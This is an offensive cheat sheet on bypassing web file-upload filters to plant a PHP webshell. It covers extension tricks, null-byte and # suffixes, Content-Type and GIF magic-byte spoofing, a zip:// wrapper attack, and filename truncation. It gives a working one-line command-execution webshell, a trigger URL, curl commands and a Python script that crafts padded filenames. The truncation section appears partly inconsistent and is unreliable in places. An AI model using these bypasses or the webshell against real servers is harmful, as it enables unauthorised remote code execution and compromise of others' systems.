Bypass Filters

[1] Changing the file extension

Alternative PHP extensions that an extension blacklist often misses, plus image extensions that are combined with them into a double extension:

  • phtml, phpt, php3, php4, php5, php6 (alternative PHP extensions)
  • png, jpg (used only as the first half of a double extension)

#Example: shell.png.php

Whether a given variant executes depends on the server's handler mapping, not on the upload filter: with Apache, an AddHandler directive for PHP matches the .php extension anywhere in a multi-extension name, while a stricter FilesMatch rule only matches a trailing .php. Check which extensions the target actually hands to the PHP interpreter before relying on one of these.

Common extensions to bypass Perl restrictions

  • .pl, .pm, .cgi, .lib

Common extensions to bypass JSP restrictions

  • .jsp, .jspx, .jsw, .jsv, and .jspf

Common extensions to bypass ColdFusion restrictions

  • .cfm, .cfml, .cfc, .dbm

[2] Appending a # after the real extension, followed by the allowed extension. The # is the URL fragment delimiter, so a check that looks at the submitted name sees .png, while any component that later parses the name as a URL stops at the #. #Example: shell.php#.png

[3] Inserting a null byte between the real extension and the allowed one. A validator that treats %00 as an ordinary character sees .gif, while the C string functions underneath stop at the null byte and write shell.php. This only works on old runtimes (PHP rejects paths containing a null byte since 5.3.4). #Example: shell.php%00.gif

[4] Changing the Content-Type while keeping the extension

Some filters only look at the Content-Type header of the uploaded part. That header is set by the client, so intercept the upload in Burp, keep the executable extension in the filename, and change the part's Content-Type to an allowed image type. If the filter also whitelists extensions, combine this with one of the extension tricks above. Example for a PHP payload:

Content-Type: image/png
filename=shell.php

[5] Changing the magic number

Filters that inspect the first bytes of the file (finfo, getimagesize and similar) are satisfied by prefixing the payload with the signature of an allowed image type. Look at the file first, then edit it:

root@kali: hexyl -n 256 file.php
root@kali: nano file.php

Put GIF87a (or GIF89a) at the very start of the file, before the <?php tag, and the file is identified as a GIF, not a JPEG: GIF87a is the GIF signature, the JPEG signature is the non-printable bytes FF D8 FF, which is why the GIF one is the convenient choice in a text editor. PHP echoes the bytes before the opening tag verbatim and then executes the code that follows, so the payload still runs.

[6] Using the PHP zip:// wrapper

Use the zip:// wrapper when the application renames uploaded files, so the name you chose for the shell is replaced with an arbitrary one and you cannot call it directly. The wrapper addresses a file by its entry name inside the archive, and a rename of the archive does not change the entries. You still need a file inclusion point in the application (the file= parameter below); zip:// is a local wrapper, so it does not depend on allow_url_include. Take the payload below

<?php echo system($_GET['cmd']); ?>

First, store this payload in a PHP file such as cmd.php. Next, zip that file into an archive:

zip shell.zip cmd.php

Then upload the archive with curl or the browser. The last step is to trigger the shell: find the name the archive was stored under in the uploads path of the target, and pass the zip:// path to the inclusion point. For the payload above, browse to a URL of the form

http://domain.com/?file=zip://uploads/(unknown)%23cmd&cmd=[command]

Replace the placeholder after uploads/ with the stored name you have found. %23 is the URL-encoded # that separates the archive path from the entry inside it (use the entry's full name, here cmd.php), and cmd is the parameter through which the command is executed.

[7] Using file name truncation

File name truncation relies on the server storing only the first N characters of the submitted name (255 on most Linux filesystems). The extension filter checks the name as it was submitted: upload.php.png passes a filter that allows png, but is stored as an image and never executes. If the name is made long enough that its last four characters, .png, fall past the limit, the stored name ends in .php instead. The final file name would therefore look like

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php

To test this, build the name into a variable such as $URL as shown below (Python 3 syntax):

URL=$(python3 -c 'print("http://domain.com/upload" + "A"*232 + ".php.png")')

and pass $URL to curl against the upload endpoint (set TARGET to the form's action URL first) to see how the server responds. The variables must be in double quotes so the shell expands them; inside single quotes curl would send the literal string $URL:

curl -i -k -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-binary "url=$URL" "$TARGET"
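To work out the padding for a given target instead of guessing, the following Python script is an added example (not from the original notes) that models the server's length limit and the filter's check, and computes a name that passes the filter as submitted and ends in .php once stored. The 255-character limit is the usual Linux filesystem maximum and is an assumption about the target; the extensions are parameters.

```python
# Added example (not from the original notes): models the length limit behind
# the truncation bypass and crafts the padded name. NAME_MAX = 255 is an
# assumption (the common Linux filesystem limit); adjust it for the target.
NAME_MAX = 255


def server_store_name(submitted: str, limit: int = NAME_MAX) -> str:
    """What a handler that truncates to the filesystem limit ends up writing."""
    return submitted[:limit]


def allowed_by_filter(submitted: str, allowed=(".png", ".jpg")) -> bool:
    """The extension filter sees the name as submitted, before truncation."""
    return submitted.lower().endswith(allowed)


def craft_truncated_name(keep_ext: str, allowed_ext: str,
                         limit: int = NAME_MAX, pad: str = "A") -> str:
    """Pad so that keep_ext ends exactly at the limit and allowed_ext is the
    part that falls off when the server truncates."""
    body = pad * (limit - len(keep_ext))
    return body + keep_ext + allowed_ext


def bypass_works(keep_ext: str, allowed_ext: str, limit: int = NAME_MAX) -> bool:
    """True when the crafted name passes the filter and is stored with keep_ext."""
    name = craft_truncated_name(keep_ext, allowed_ext, limit)
    stored = server_store_name(name, limit)
    return allowed_by_filter(name, (allowed_ext,)) and stored.endswith(keep_ext)


if __name__ == "__main__":
    name = craft_truncated_name(".php", ".png")
    stored = server_store_name(name)
    print(f"submitted: {len(name)} chars, ends with {name[-8:]}")
    print(f"stored:    {len(stored)} chars, ends with {stored[-4:]}")
```

If the limit is larger than assumed the whole name survives and the stored file keeps its .png ending, so when the test upload does not execute, try the next plausible limit (the web framework or a database column may impose a shorter one than the filesystem) rather than a longer padding.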
